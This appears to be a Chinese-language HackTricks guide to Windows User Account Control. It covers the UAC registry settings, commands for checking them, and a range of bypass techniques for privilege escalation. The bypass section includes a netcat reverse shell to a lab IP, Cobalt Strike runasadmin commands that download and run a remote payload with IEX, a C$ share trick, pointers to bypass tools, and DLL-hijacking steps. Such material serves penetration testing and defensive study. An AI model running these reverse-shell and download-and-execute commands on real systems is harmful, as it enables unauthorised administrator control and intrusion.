UAC - 用户帐户控制
Reading time: 16 minutes
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
UAC
用户帐户控制 (UAC) 是一个功能,允许提升活动的同意提示。应用程序具有不同的 integrity
级别,具有高级别的程序可以执行可能危害系统的任务。当 UAC 启用时,应用程序和任务始终在非管理员帐户的安全上下文中运行,除非管理员明确授权这些应用程序/任务以管理员级别访问系统进行运行。这是一个便利功能,可以保护管理员免受意外更改,但不被视为安全边界。
有关完整性级别的更多信息:
当 UAC 生效时,管理员用户会获得 2 个令牌:一个标准用户密钥,用于以常规级别执行常规操作,另一个则具有管理员权限。
此 页面 深入讨论了 UAC 的工作原理,包括登录过程、用户体验和 UAC 架构。管理员可以使用安全策略在本地级别(使用 secpol.msc)配置 UAC 的工作方式,或通过组策略对象 (GPO) 在 Active Directory 域环境中配置并推送。各种设置在 这里 进行了详细讨论。可以为 UAC 设置 10 个组策略设置。以下表格提供了更多详细信息:
组策略设置 | 注册表键 | 默认设置 |
---|---|---|
用户帐户控制:内置管理员帐户的管理员批准模式 | FilterAdministratorToken | 禁用 |
用户帐户控制:允许 UIAccess 应用程序在不使用安全桌面的情况下提示提升 | EnableUIADesktopToggle | 禁用 |
用户帐户控制:管理员在管理员批准模式下的提升提示行为 | ConsentPromptBehaviorAdmin | 对非 Windows 二进制文件提示同意 |
用户帐户控制:标准用户的提升提示行为 | ConsentPromptBehaviorUser | 在安全桌面上提示凭据 |
用户帐户控制:检测应用程序安装并提示提升 | EnableInstallerDetection | 启用(家庭版默认)禁用(企业版默认) |
用户帐户控制:仅提升已签名和验证的可执行文件 | ValidateAdminCodeSignatures | 禁用 |
用户帐户控制:仅提升安装在安全位置的 UIAccess 应用程序 | EnableSecureUIAPaths | 启用 |
用户帐户控制:在管理员批准模式下运行所有管理员 | EnableLUA | 启用 |
用户帐户控制:在提示提升时切换到安全桌面 | PromptOnSecureDesktop | 启用 |
用户帐户控制:将文件和注册表写入失败虚拟化到每用户位置 | EnableVirtualization | 启用 |
UAC 绕过理论
一些程序会在用户属于 管理员组时自动提升。这些二进制文件在其 Manifests 中具有 autoElevate 选项,值为 True。该二进制文件还必须由 Microsoft 签名。
然后,为了绕过 UAC(从中等完整性级别提升到高),一些攻击者使用这种二进制文件来执行任意代码,因为它将从高完整性级别进程中执行。
您可以使用 Sysinternals 的工具 sigcheck.exe 检查二进制文件的 Manifest。您可以使用 Process Explorer 或 Process Monitor(来自 Sysinternals)查看进程的完整性级别。
检查 UAC
要确认 UAC 是否启用,请执行:
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
如果是 1
,则 UAC 已激活;如果是 0
或者 不存在,则 UAC 未激活。
然后,检查 配置的级别:
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5
- 如果
0
,则 UAC 不会提示(如 禁用) - 如果
1
,则管理员会被 要求输入用户名和密码 以高权限执行二进制文件(在安全桌面上) - 如果
2
(始终通知我),当管理员尝试以高权限执行某些操作时,UAC 将始终要求确认(在安全桌面上) - 如果
3
,类似于1
,但不一定在安全桌面上 - 如果
4
,类似于2
,但不一定在安全桌面上 - 如果
5
(默认),它会要求管理员确认以高权限运行非 Windows 二进制文件
然后,您需要查看 LocalAccountTokenFilterPolicy
的值
如果值为 0
,则只有 RID 500 用户(内置管理员)能够在没有 UAC 的情况下执行 管理员任务,如果为 1
,则 “Administrators” 组中的所有帐户都可以执行这些任务。
最后,查看 FilterAdministratorToken
键的值
如果 0
(默认),则 内置管理员帐户可以 执行远程管理任务;如果 1
,则内置管理员帐户 无法 执行远程管理任务,除非 LocalAccountTokenFilterPolicy
设置为 1
。
总结
- 如果
EnableLUA=0
或 不存在,对任何人都没有 UAC - 如果
EnableLua=1
且LocalAccountTokenFilterPolicy=1
,对任何人都没有 UAC - 如果
EnableLua=1
且LocalAccountTokenFilterPolicy=0
且FilterAdministratorToken=0
,对 RID 500(内置管理员)没有 UAC - 如果
EnableLua=1
且LocalAccountTokenFilterPolicy=0
且FilterAdministratorToken=1
,对所有人都有 UAC
所有这些信息可以通过 metasploit 模块收集: post/windows/gather/win_privs
您还可以检查用户的组并获取完整性级别:
net user %username%
whoami /groups | findstr Level
UAC 绕过
note
请注意,如果您可以图形访问受害者,UAC 绕过是直接的,因为您可以在 UAC 提示出现时简单地点击“是”
UAC 绕过在以下情况下是必要的:UAC 已激活,您的进程在中等完整性上下文中运行,并且您的用户属于管理员组。
重要的是要提到,如果 UAC 处于最高安全级别(始终),则绕过 UAC 要比在其他任何级别(默认)中要困难得多。
UAC 禁用
如果 UAC 已经禁用(ConsentPromptBehaviorAdmin
为 0
),您可以使用类似的方式以管理员权限执行反向 shell(高完整性级别):
#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
UAC绕过与令牌复制
- https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
- https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html
非常 基本的UAC "绕过"(完全文件系统访问)
如果你有一个在Administrators组内的用户的shell,你可以通过SMB挂载C$共享到一个新的磁盘上,你将访问文件系统内的所有内容(甚至是Administrator的主文件夹)。
warning
看起来这个技巧不再有效
net use Z: \\127.0.0.1\c$
cd C$
#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop
UAC绕过与Cobalt Strike
Cobalt Strike技术仅在UAC未设置为最高安全级别时有效。
# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]
# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
Empire 和 Metasploit 也有几个模块可以 绕过 UAC。
KRBUACBypass
文档和工具在 https://github.com/wh0amitz/KRBUACBypass
UAC 绕过漏洞
UACME 是几个 UAC 绕过漏洞的 汇编。请注意,您需要 使用 Visual Studio 或 msbuild 编译 UACME。编译将创建几个可执行文件(如 Source\Akagi\outout\x64\Debug\Akagi.exe
),您需要知道 您需要哪个。
您应该 小心,因为某些绕过会 提示其他程序,这会 警告 用户 有事情发生。
UACME 有 每种技术开始工作的构建版本。您可以搜索影响您版本的技术:
PS C:\> [environment]::OSVersion.Version
Major Minor Build Revision
----- ----- ----- --------
10 0 14393 0
也可以通过 this 页面获取 Windows 版本 1607
的构建版本。
更多 UAC 绕过
所有在这里使用的绕过 AUC 的技术 都需要与受害者的 完整交互式 shell(普通的 nc.exe shell 不够)。
您可以使用 meterpreter 会话获取。迁移到 Session 值等于 1 的 进程:
(explorer.exe 应该可以工作)
带 GUI 的 UAC 绕过
如果您可以访问 GUI,您只需在出现 UAC 提示时接受它,您实际上不需要绕过它。因此,获取对 GUI 的访问将允许您绕过 UAC。
此外,如果您获得了某人正在使用的 GUI 会话(可能通过 RDP),则有 一些工具将以管理员身份运行,您可以 直接以管理员身份运行 例如 cmd,而无需再次被 UAC 提示,如 https://github.com/oski02/UAC-GUI-Bypass-appverif。这可能会更 隐蔽。
嘈杂的暴力破解 UAC 绕过
如果您不在乎嘈杂,您可以始终 运行类似 https://github.com/Chainski/ForceAdmin 的工具,该工具 请求提升权限,直到用户接受它。
您自己的绕过 - 基本 UAC 绕过方法
如果您查看 UACME,您会注意到 大多数 UAC 绕过利用 Dll Hijacking 漏洞(主要是在 C:\Windows\System32 中写入恶意 dll)。 阅读此内容以了解如何找到 Dll Hijacking 漏洞。
- 找到一个会 自动提升 的二进制文件(检查它执行时是否以高完整性级别运行)。
- 使用 procmon 查找可能受到 DLL Hijacking 影响的 "NAME NOT FOUND" 事件。
- 您可能需要在某些 受保护路径(如 C:\Windows\System32)中 写入 DLL,而您没有写入权限。您可以使用以下方法绕过此限制:
- wusa.exe:Windows 7、8 和 8.1。它允许在受保护路径中提取 CAB 文件的内容(因为此工具是以高完整性级别执行的)。
- IFileOperation:Windows 10。
- 准备一个 脚本 将您的 DLL 复制到受保护路径并执行易受攻击的自动提升二进制文件。
另一种 UAC 绕过技术
该技术是观察一个 自动提升的二进制文件 是否尝试 从注册表 中 读取 要 执行 的 二进制文件 或 命令 的 名称/路径(如果二进制文件在 HKCU 中搜索此信息,则更有趣)。
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。